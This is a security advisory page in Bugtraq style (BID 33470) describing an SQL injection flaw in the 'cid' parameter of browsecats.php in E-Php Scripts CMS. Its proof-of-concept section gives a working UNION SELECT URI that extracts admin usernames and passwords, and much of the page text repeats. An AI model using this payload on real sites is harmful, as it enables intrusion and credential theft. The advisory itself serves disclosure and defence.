E-Php Scripts CMS 'browsecats.php' SQL Injection Vulnerability
BID:33470
Info
E-Php Scripts CMS 'browsecats.php' SQL Injection Vulnerability
| Bugtraq ID: | 33470 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 27 2009 12:00AM |
| Updated: | Jan 28 2009 10:19PM |
| Credit: | SaiedHacker |
| Vulnerable: |
E-Php Scripts CMS 0 |
| Not Vulnerable: | |
Discussion
E-Php Scripts CMS 'browsecats.php' SQL Injection Vulnerability
E-Php Scripts CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
E-Php Scripts CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
E-Php Scripts CMS 'browsecats.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin
http://target/cms/browsecats.php?cid=-12%20union%20select%200,concat%28es_username,0x3a,es_password%29,2,3%20%20from%20esnm_admin
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin
http://target/cms/browsecats.php?cid=-12%20union%20select%200,concat%28es_username,0x3a,es_password%29,2,3%20%20from%20esnm_admin
Solution / Fix
E-Php Scripts CMS 'browsecats.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
E-Php Scripts CMS 'browsecats.php' SQL Injection Vulnerability
References:
References:
- E-Php Scripts CMS Homepage (E-Php Scripts)